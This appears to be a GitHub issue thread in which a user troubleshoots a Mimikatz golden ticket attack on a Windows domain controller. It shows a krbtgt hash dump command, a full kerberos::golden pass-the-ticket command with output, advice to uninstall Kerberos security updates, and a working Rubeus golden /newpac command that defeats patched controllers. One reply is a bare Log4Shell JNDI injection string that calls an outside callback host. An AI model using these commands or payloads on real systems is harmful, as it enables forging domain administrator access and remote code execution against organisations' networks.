ISSUE: Losing tickets when attempting to use the Mimikatz golden module

[rick-engle]

I have been going through many of your wikis and various articles on Mimikatz and cannot understand why I can’t get the Golden Ticket attack to work. I am injecting a golden ticket into my session but as soon as I try an elevated privilege command like dir \servername\c$, running klist shows my that my ticket is no longer cached.

I am running Mimikatz on a non-domain joined Windows 10 PC that is on the same network as an unpatched Windows Server 2012 R2 Domain Controller.

I have the SID of my domain controller (sid:S-1-5-21…) the full domain name, and the hash for my krbtgt account. I got the NTLM HASH for the krbtgt account like this:

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : MYDOMAIN / S-1-5-21-4053458607-1441617025- XXXXXXXXXX

RID : 000001f6 (502)
User : krbtgt

• Primary
  NTLM : 09a4891da94d1f2522afdc7c4dd09b7b
  LM :
  Hash NTLM: 09a4891da94d1f2522afdc7c4dd09b7b
  ntlm- 0: 09a4891da94d1f2522afdc7c4dd09b7b
  lm - 0: 59968800dc52757ec5fe14f86b2103cd

Then I run this command in Mimikatz which is successful:
kerberos::golden /user:baduser1 /domain:mydomain.com /sid:S-1-5-21-4053458607-1441617025-XXXXXXXXXX /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

mimikatz # kerberos::golden /user:baduser1 /domain:toondom2.com /sid:S-1-5-21-4053458607-1441617025-3390084498 /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( [email protected] )

\ / ## > https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com/ / https://mysmartlogon.com/ ***/

User : baduser1
Domain : mydomain.com (MYDOMAIN)
SID : S-1-5-21-4053458607-1441617025- XXXXXXXXXX
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 09a4891da94d1f2522afdc7c4dd09b7b - rc4_hmac_nt
Lifetime : 12/19/2022 5:59:20 PM ; 12/16/2032 5:59:20 PM ; 12/16/2032 5:59:20 PM
-> Ticket : ** Pass The Ticket **

• PAC generated
• PAC signed
• EncTicketPart generated
• EncTicketPart encrypted
• KrbCred generated

Golden ticket for 'baduser1 @ mydomain.com' successfully submitted for current session

I then exit Mimikatz, and check my ticket with klist and I see my ticket:
Current LogonId is 0:0xab242d

Cached Tickets: (1)

#0> Client: baduser1 @ toondom2.com
Server: krbtgt/mydomain.com @ mydomain.com
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 12/19/2022 17:59:20 (local)
End Time: 12/16/2032 17:59:20 (local)
Renew Time: 12/16/2032 17:59:20 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

But then as soon as I try to access my domain controller using something like this:
C:\Attackfolder\x64>dir \DC1.mydomain.com\c$
The username or password is incorrect.

And then running klist again:
Current LogonId is 0:0xab242d
Cached Tickets: (0)

I have tried so many different options in Mimikatz and while all of the articles seem to make it look very simple, my ticket is always removed/revoked, and I don’t succeed in the attack.

Do you see what I’m doing wrong and have a suggestion?

[Lucifer1993]

${jndi:ldap://${java:version}.dx3hbm.ceye.io}

[rick-engle]

@Lucifer1993, I have no idea what you meant by that reply, can you explain?

[SergANT85]

Hello!

@Lucifer1993

I have spended a lot of time. I can find issues.

Probles is November update for Windows (KB5020805). If it removed - all work fine.

https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/november-2022-out-of-band-update-released-take-action/ba-p/3680144

https://support.microsoft.com/en-gb/topic/kb5020805-how-to-manage-kerberos-protocol-changes-related-to-cve-2022-37967-997e9acc-67c5-48e1-8d0d-190269bf4efb#registry5020805

https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d
https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#2961

[rick-engle]

Hello @SergANT85 . I don't have update KB5020805 installed. My latest update is KB5021294. Are there any event log entries that show that the kerberos golden ticket is revoked? It sounds like it is related to RC4.
Before you fixed the issue did you also see the scenario where you would get a ticket using Mimikatz and then as soon as you tried to access the domain controller like dir \MYDC1.com\c$ then the ticket is lost. I see it first using klist but as soon as I try and access the DC then the ticket is lost.

[rick-engle]

I've been looking into this, and it looks like Mimikatz can't currently overcome this issue. I found that Rubeus works as an alternative solution using this command from a domain-joined PC:
Rubeus golden /newpac /rc4:krbtgtNTLMhash /ldap /user:nondomainadminuser /groups:512 /endtime:10y /ptt
My understanding is that Mimikatz does not support the equivalent of the Rubeus /newpac command.
The Rubeus solution also works on a patched domain controller, I was using Windows Server 2012 R2 but it also works on Windows Server 2019.

[SergANT85]

@rick-engle

Hello!

KB5020805 is in cumulative updates.
You can try to deinstall updates after Novenmer 2022, and Mimikatz golden tiket will work true (ok).

[t3hbb]

@rick-engle

This blog post covers a similar issue - it might help possibly : https://www.cybaverse.co.uk/resources/the-curious-case-of-the-kerberos-realm

[rick-engle]

Thank you @t3hbb. I will look at that blog article. in the meantime, my workaround was to switch to using Rubeus.exe as it is working for this scenario with the current security updates that are installed on my domain controller.